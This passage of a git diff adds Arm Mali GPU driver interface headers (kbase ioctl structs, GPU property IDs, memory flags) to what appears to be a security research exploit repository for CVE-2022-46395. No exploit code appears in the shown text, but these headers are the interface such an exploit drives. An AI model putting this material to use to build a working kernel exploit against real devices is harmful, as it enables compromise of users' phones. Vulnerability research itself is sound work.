 * @create_flags: Flags - see base_context_create_flags
 */
struct kbase_ioctl_set_flags {
	__u32 create_flags;
};

#define KBASE_IOCTL_SET_FLAGS \
	_IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

/**
 * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
 *
 * @buffer: Pointer to the buffer to store properties into
 * @size: Size of the buffer
 * @flags: Flags - must be zero for now
 *
 * The ioctl will return the number of bytes stored into @buffer or an error
 * on failure (e.g. @size is too small). If @size is specified as 0 then no
 * data will be written but the return value will be the number of bytes needed
 * for all the properties.
 *
 * @flags may be used in the future to request a different format for the
 * buffer. With @flags == 0 the following format is used.
 *
 * The buffer will be filled with pairs of values, a __u32 key identifying the
 * property followed by the value. The size of the value is identified using
 * the bottom bits of the key. The value then immediately followed the key and
 * is tightly packed (there is no padding). All keys and values are
 * little-endian.
 *
 * 00 = __u8
 * 01 = __u16
 * 10 = __u32
 * 11 = __u64
 */
struct kbase_ioctl_get_gpuprops {
	__u64 buffer;
	__u32 size;
	__u32 flags;
};

#define KBASE_IOCTL_GET_GPUPROPS \
	_IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)

/**
 * union kbase_ioctl_mem_alloc - Allocate memory on the GPU
 * @in: Input parameters
 * @in.va_pages: The number of pages of virtual address space to reserve
 * @in.commit_pages: The number of physical pages to allocate
 * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
 * @in.flags: Flags
 * @out: Output parameters
 * @out.flags: Flags
 * @out.gpu_va: The GPU virtual address which is allocated
 */
union kbase_ioctl_mem_alloc {
	struct {
		__u64 va_pages;
		__u64 commit_pages;
		__u64 extension;
		__u64 flags;
	} in;
	struct {
		__u64 flags;
		__u64 gpu_va;
	} out;
};

#define KBASE_IOCTL_MEM_ALLOC \
	_IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)

/**
 * struct kbase_ioctl_mem_query - Query properties of a GPU memory region
 * @in: Input parameters
 * @in.gpu_addr: A GPU address contained within the region
 * @in.query: The type of query
 * @out: Output parameters
 * @out.value: The result of the query
 *
 * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
 */
union kbase_ioctl_mem_query {
	struct {
		__u64 gpu_addr;
		__u64 query;
	} in;
	struct {
		__u64 value;
	} out;
};

#define KBASE_IOCTL_MEM_QUERY \
	_IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)

/* Accepted values for kbase_ioctl_mem_query.in.query. */
#define KBASE_MEM_QUERY_COMMIT_SIZE	((__u64)1)
#define KBASE_MEM_QUERY_VA_SIZE		((__u64)2)
#define KBASE_MEM_QUERY_FLAGS		((__u64)3)

/**
 * struct kbase_ioctl_mem_free - Free a memory region
 * @gpu_addr: Handle to the region to free
 */
struct kbase_ioctl_mem_free {
	__u64 gpu_addr;
};

#define KBASE_IOCTL_MEM_FREE \
	_IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
+
/**
 * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
 * @buffer_count: requested number of dumping buffers
 * @fe_bm: counters selection bitmask (Front end)
 * @shader_bm: counters selection bitmask (Shader)
 * @tiler_bm: counters selection bitmask (Tiler)
 * @mmu_l2_bm: counters selection bitmask (MMU_L2)
 *
 * A fd is returned from the ioctl if successful, or a negative value on error
 */
struct kbase_ioctl_hwcnt_reader_setup {
	__u32 buffer_count;
	__u32 fe_bm;
	__u32 shader_bm;
	__u32 tiler_bm;
	__u32 mmu_l2_bm;
};

#define KBASE_IOCTL_HWCNT_READER_SETUP \
	_IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)

/**
 * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
 * @dump_buffer: GPU address to write counters to
 * @fe_bm: counters selection bitmask (Front end)
 * @shader_bm: counters selection bitmask (Shader)
 * @tiler_bm: counters selection bitmask (Tiler)
 * @mmu_l2_bm: counters selection bitmask (MMU_L2)
 */
struct kbase_ioctl_hwcnt_enable {
	__u64 dump_buffer;
	__u32 fe_bm;
	__u32 shader_bm;
	__u32 tiler_bm;
	__u32 mmu_l2_bm;
};

#define KBASE_IOCTL_HWCNT_ENABLE \
	_IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)

/* Argument-less commands: trigger a counter dump / clear the counters. */
#define KBASE_IOCTL_HWCNT_DUMP \
	_IO(KBASE_IOCTL_TYPE, 10)

#define KBASE_IOCTL_HWCNT_CLEAR \
	_IO(KBASE_IOCTL_TYPE, 11)

/**
 * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to.
 * @data: Counter samples for the dummy model.
 * @size: Size of the counter sample data.
 * @padding: Padding.
 */
struct kbase_ioctl_hwcnt_values {
	__u64 data;
	__u32 size;
	__u32 padding;
};

#define KBASE_IOCTL_HWCNT_SET \
	_IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)

/**
 * struct kbase_ioctl_disjoint_query - Query the disjoint counter
 * @counter: A counter of disjoint events in the kernel
 */
struct kbase_ioctl_disjoint_query {
	__u32 counter;
};

#define KBASE_IOCTL_DISJOINT_QUERY \
	_IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)

/**
 * struct kbase_ioctl_get_ddk_version - Query the kernel version
 * @version_buffer: Buffer to receive the kernel version string
 * @size: Size of the buffer
 * @padding: Padding
 *
 * The ioctl will return the number of bytes written into version_buffer
 * (which includes a NULL byte) or a negative error code
 *
 * The ioctl request code has to be _IOW because the data in ioctl struct is
 * being copied to the kernel, even though the kernel then writes out the
 * version info to the buffer specified in the ioctl.
 */
struct kbase_ioctl_get_ddk_version {
	__u64 version_buffer;
	__u32 size;
	__u32 padding;
};

#define KBASE_IOCTL_GET_DDK_VERSION \
	_IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
+
/*
 * NOTE: all three JIT-init variants below deliberately share command number
 * 14; the struct size encoded by _IOW() disambiguates which version user
 * space is speaking.
 */
/**
 * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
 * allocator (between kernel driver
 * version 10.2--11.4)
 * @va_pages: Number of VA pages to reserve for JIT
 *
 * Note that depending on the VA size of the application and GPU, the value
 * specified in @va_pages may be ignored.
 *
 * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
 * backwards compatibility.
 */
struct kbase_ioctl_mem_jit_init_10_2 {
	__u64 va_pages;
};

#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
	_IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)

/**
 * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
 * allocator (between kernel driver
 * version 11.5--11.19)
 * @va_pages: Number of VA pages to reserve for JIT
 * @max_allocations: Maximum number of concurrent allocations
 * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
 * @group_id: Group ID to be used for physical allocations
 * @padding: Currently unused, must be zero
 *
 * Note that depending on the VA size of the application and GPU, the value
 * specified in @va_pages may be ignored.
 *
 * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
 * backwards compatibility.
 */
struct kbase_ioctl_mem_jit_init_11_5 {
	__u64 va_pages;
	__u8 max_allocations;
	__u8 trim_level;
	__u8 group_id;
	__u8 padding[5];
};

#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
	_IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)

/**
 * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
 * allocator
 * @va_pages: Number of GPU virtual address pages to reserve for just-in-time
 * memory allocations
 * @max_allocations: Maximum number of concurrent allocations
 * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
 * @group_id: Group ID to be used for physical allocations
 * @padding: Currently unused, must be zero
 * @phys_pages: Maximum number of physical pages to allocate just-in-time
 *
 * Note that depending on the VA size of the application and GPU, the value
 * specified in @va_pages may be ignored.
 */
struct kbase_ioctl_mem_jit_init {
	__u64 va_pages;
	__u8 max_allocations;
	__u8 trim_level;
	__u8 group_id;
	__u8 padding[5];
	__u64 phys_pages;
};

#define KBASE_IOCTL_MEM_JIT_INIT \
	_IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
+
/**
 * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
 *
 * @handle: GPU memory handle (GPU VA)
 * @user_addr: The address where it is mapped in user space
 * @size: The number of bytes to synchronise
 * @type: The direction to synchronise: 0 is sync to memory (clean),
 * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
 * @padding: Padding to round up to a multiple of 8 bytes, must be zero
 */
struct kbase_ioctl_mem_sync {
	__u64 handle;
	__u64 user_addr;
	__u64 size;
	__u8 type;
	__u8 padding[7];
};

#define KBASE_IOCTL_MEM_SYNC \
	_IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)

/**
 * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
 *
 * @in: Input parameters
 * @in.gpu_addr: The GPU address of the memory region
 * @in.cpu_addr: The CPU address to locate
 * @in.size: A size in bytes to validate is contained within the region
 * @out: Output parameters
 * @out.offset: The offset from the start of the memory region to @cpu_addr
 */
union kbase_ioctl_mem_find_cpu_offset {
	struct {
		__u64 gpu_addr;
		__u64 cpu_addr;
		__u64 size;
	} in;
	struct {
		__u64 offset;
	} out;
};

#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
	_IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)

/**
 * struct kbase_ioctl_get_context_id - Get the kernel context ID
 *
 * @id: The kernel context ID
 */
struct kbase_ioctl_get_context_id {
	__u32 id;
};

#define KBASE_IOCTL_GET_CONTEXT_ID \
	_IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)

/**
 * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
 *
 * @flags: Flags
 *
 * The ioctl returns a file descriptor when successful
 */
struct kbase_ioctl_tlstream_acquire {
	__u32 flags;
};

#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
	_IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)

#define KBASE_IOCTL_TLSTREAM_FLUSH \
	_IO(KBASE_IOCTL_TYPE, 19)

/**
 * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
 *
 * @gpu_addr: The memory region to modify
 * @pages: The number of physical pages that should be present
 *
 * The ioctl may return on the following error codes or 0 for success:
 * -ENOMEM: Out of memory
 * -EINVAL: Invalid arguments
 */
struct kbase_ioctl_mem_commit {
	__u64 gpu_addr;
	__u64 pages;
};

#define KBASE_IOCTL_MEM_COMMIT \
	_IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)

/**
 * union kbase_ioctl_mem_alias - Create an alias of memory regions
 * @in: Input parameters
 * @in.flags: Flags, see BASE_MEM_xxx
 * @in.stride: Bytes between start of each memory region
 * @in.nents: The number of regions to pack together into the alias
 * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
 * @out: Output parameters
 * @out.flags: Flags, see BASE_MEM_xxx
 * @out.gpu_va: Address of the new alias
 * @out.va_pages: Size of the new alias
 */
union kbase_ioctl_mem_alias {
	struct {
		__u64 flags;
		__u64 stride;
		__u64 nents;
		__u64 aliasing_info;
	} in;
	struct {
		__u64 flags;
		__u64 gpu_va;
		__u64 va_pages;
	} out;
};
+
+#define KBASE_IOCTL_MEM_ALIAS \
+ _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
+
+enum base_mem_import_type {
+ BASE_MEM_IMPORT_TYPE_INVALID = 0,
+ /*
+ * Import type with value 1 is deprecated.
+ */
+ BASE_MEM_IMPORT_TYPE_UMM = 2,
+ BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3
+};
+
+/**
+ * struct base_mem_import_user_buffer - Handle of an imported user buffer
+ *
+ * @ptr: address of imported user buffer
+ * @length: length of imported user buffer in bytes
+ *
+ * This structure is used to represent a handle of an imported user buffer.
+ */
+
+struct base_mem_import_user_buffer {
+ __u64 ptr;
+ __u64 length;
+};
+
+/**
+ * union kbase_ioctl_mem_import - Import memory for use by the GPU
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.phandle: Handle to the external memory
+ * @in.type: Type of external memory, see base_mem_import_type
+ * @in.padding: Amount of extra VA pages to append to the imported buffer
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_import {
+ struct {
+ __u64 flags;
+ __u64 phandle;
+ __u32 type;
+ __u32 padding;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_IMPORT \
+ _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
+
+/**
+ * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
+ * @gpu_va: The GPU region to modify
+ * @flags: The new flags to set
+ * @mask: Mask of the flags to modify
+ */
+struct kbase_ioctl_mem_flags_change {
+ __u64 gpu_va;
+ __u64 flags;
+ __u64 mask;
+};
+
+#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
+ _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
+
+/**
+ * struct kbase_ioctl_stream_create - Create a synchronisation stream
+ * @name: A name to identify this stream. Must be NULL-terminated.
+ *
+ * Note that this is also called a "timeline", but is named stream to avoid
+ * confusion with other uses of the word.
+ *
+ * Unused bytes in @name (after the first NULL byte) must also be NULL bytes.
+ *
+ * The ioctl returns a file descriptor.
+ */
+struct kbase_ioctl_stream_create {
+ char name[32];
+};
+
+#define KBASE_IOCTL_STREAM_CREATE \
+ _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
+
+/**
+ * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
+ * @fd: The file descriptor to validate
+ */
+struct kbase_ioctl_fence_validate {
+ int fd;
+};
+
+#define KBASE_IOCTL_FENCE_VALIDATE \
+ _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
+
+/**
+ * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
+ * @buffer: Pointer to the information
+ * @len: Length
+ * @padding: Padding
+ *
+ * The data provided is accessible through a debugfs file
+ */
+struct kbase_ioctl_mem_profile_add {
+ __u64 buffer;
+ __u32 len;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_MEM_PROFILE_ADD \
+ _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to map
+ */
+struct kbase_ioctl_sticky_resource_map {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
+ _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
+
+/**
+ * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource which was
+ *                                            previously permanently mapped
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to unmap
+ */
+struct kbase_ioctl_sticky_resource_unmap {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
+ _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
+
+/**
+ * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
+ * the GPU memory region for
+ * the given gpu address and
+ * the offset of that address
+ * into the region
+ * @in: Input parameters
+ * @in.gpu_addr: GPU virtual address
+ * @in.size: Size in bytes within the region
+ * @out: Output parameters
+ * @out.start: Address of the beginning of the memory region enclosing @gpu_addr
+ * for the length of @offset bytes
+ * @out.offset: The offset from the start of the memory region to @gpu_addr
+ */
+union kbase_ioctl_mem_find_gpu_start_and_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 start;
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
+
+#define KBASE_IOCTL_CINSTR_GWT_START \
+ _IO(KBASE_IOCTL_TYPE, 33)
+
+#define KBASE_IOCTL_CINSTR_GWT_STOP \
+ _IO(KBASE_IOCTL_TYPE, 34)
+
+/**
+ * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
+ * @in: Input parameters
+ * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
+ * @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
+ * @in.len: Number of addresses the buffers can hold.
+ * @in.padding: padding
+ * @out: Output parameters
+ * @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
+ * @out.more_data_available: Status indicating if more addresses are available.
+ * @out.padding: padding
+ *
+ * This structure is used when performing a call to dump GPU write fault
+ * addresses.
+ */
+union kbase_ioctl_cinstr_gwt_dump {
+ struct {
+ __u64 addr_buffer;
+ __u64 size_buffer;
+ __u32 len;
+ __u32 padding;
+
+ } in;
+ struct {
+ __u32 no_of_addr_collected;
+ __u8 more_data_available;
+ __u8 padding[27];
+ } out;
+};
+
+#define KBASE_IOCTL_CINSTR_GWT_DUMP \
+ _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
+
+/**
+ * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
+ *
+ * @va_pages: Number of VA pages to reserve for EXEC_VA
+ */
+struct kbase_ioctl_mem_exec_init {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_EXEC_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
+
+/**
+ * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
+ * cpu/gpu time (counter values)
+ * @in: Input parameters
+ * @in.request_flags: Bit-flags indicating the requested types.
+ * @in.paddings: Unused, size alignment matching the out.
+ * @out: Output parameters
+ * @out.sec: Integer field of the monotonic time, unit in seconds.
+ * @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
+ * @out.padding: Unused, for __u64 alignment
+ * @out.timestamp: System wide timestamp (counter) value.
+ * @out.cycle_counter: GPU cycle counter value.
+ */
+union kbase_ioctl_get_cpu_gpu_timeinfo {
+ struct {
+ __u32 request_flags;
+ __u32 paddings[7];
+ } in;
+ struct {
+ __u64 sec;
+ __u32 nsec;
+ __u32 padding;
+ __u64 timestamp;
+ __u64 cycle_counter;
+ } out;
+};
+
+#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
+ _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
+
+/**
+ * struct kbase_ioctl_context_priority_check - Check the max possible priority
+ * @priority: Input priority & output priority
+ */
+
+struct kbase_ioctl_context_priority_check {
+ __u8 priority;
+};
+
+#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
+
+/**
+ * struct kbase_ioctl_set_limited_core_count - Set the limited core count.
+ *
+ * @max_core_count: Maximum core count
+ */
+struct kbase_ioctl_set_limited_core_count {
+ __u8 max_core_count;
+};
+
+#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
+ _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
+
+
+/***************
+ * Pixel ioctls *
+ ***************/
+
+/**
+ * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
+ *
+ * @dur_usec: Duration for GPU to stay awake.
+ */
+struct kbase_ioctl_apc_request {
+ __u32 dur_usec;
+};
+
+#define KBASE_IOCTL_APC_REQUEST \
+ _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
+
+/***************
+ * test ioctls *
+ ***************/
+#if MALI_UNIT_TEST
+/* These ioctls are purely for test purposes and are not used in the production
+ * driver, they therefore may change without notice
+ */
+
+#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
+
+
+/**
+ * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
+ * @bytes_collected: number of bytes read by user
+ * @bytes_generated: number of bytes generated by tracepoints
+ */
+struct kbase_ioctl_tlstream_stats {
+ __u32 bytes_collected;
+ __u32 bytes_generated;
+};
+
+#define KBASE_IOCTL_TLSTREAM_STATS \
+ _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
+
+#endif /* MALI_UNIT_TEST */
+
+/* Customer extension range */
+#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
+
+/* If the integration needs extra ioctl add them there
+ * like this:
+ *
+ * struct my_ioctl_args {
+ * ....
+ * }
+ *
+ * #define KBASE_IOCTL_MY_IOCTL \
+ * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
+ */
+
+
+/**********************************
+ * Definitions for GPU properties *
+ **********************************/
+#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
+#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
+#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
+#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
+
+#define KBASE_GPUPROP_PRODUCT_ID 1
+#define KBASE_GPUPROP_VERSION_STATUS 2
+#define KBASE_GPUPROP_MINOR_REVISION 3
+#define KBASE_GPUPROP_MAJOR_REVISION 4
+/* 5 previously used for GPU speed */
+#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
+/* 7 previously used for minimum GPU speed */
+#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
+#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
+#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
+#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
+#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
+
+#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
+#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
+#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
+
+#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
+#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
+
+#define KBASE_GPUPROP_MAX_THREADS 18
+#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
+#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
+#define KBASE_GPUPROP_MAX_REGISTERS 21
+#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
+#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
+#define KBASE_GPUPROP_IMPL_TECH 24
+
+#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
+#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
+#define KBASE_GPUPROP_RAW_L2_PRESENT 27
+#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
+#define KBASE_GPUPROP_RAW_L2_FEATURES 29
+#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
+#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
+#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
+#define KBASE_GPUPROP_RAW_AS_PRESENT 33
+#define KBASE_GPUPROP_RAW_JS_PRESENT 34
+#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
+#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
+#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
+#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
+#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
+#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
+#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
+#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
+#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
+#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
+#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
+#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
+#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
+#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
+#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
+#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
+#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
+#define KBASE_GPUPROP_RAW_GPU_ID 55
+#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
+#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
+#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
+#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
+#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
+
+#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
+#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
+#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
+#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
+#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
+#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
+#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
+#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
+#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
+#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
+#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
+#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
+#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
+#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
+#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
+#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
+#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
+#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
+#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
+
+#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
+
+#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
+
+#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
+#define KBASE_GPUPROP_TLS_ALLOC 84
+#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
+
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+
+#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h
new file mode 100644
index 0000000..5edc780
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h
@@ -0,0 +1,1220 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_JM_KERNEL_H_
+#define _UAPI_BASE_JM_KERNEL_H_
+
+#include <linux/types.h>
+
+typedef __u32 base_mem_alloc_flags;
+/* Memory allocation, access/hint flags.
+ *
+ * See base_mem_alloc_flags.
+ */
+
+/* IN */
+/* Read access CPU side
+ */
+#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
+
+/* Write access CPU side
+ */
+#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
+
+/* Read access GPU side
+ */
+#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
+
+/* Write access GPU side
+ */
+#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
+
+/* Execute allowed on the GPU side
+ */
+#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
+
+/* Will be permanently mapped in kernel space.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
+
+/* The allocation will completely reside within the same 4GB chunk in the GPU
+ * virtual space.
+ * Since this flag is primarily required only for the TLS memory which will
+ * not be used to contain executable code and also not used for Tiler heap,
+ * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
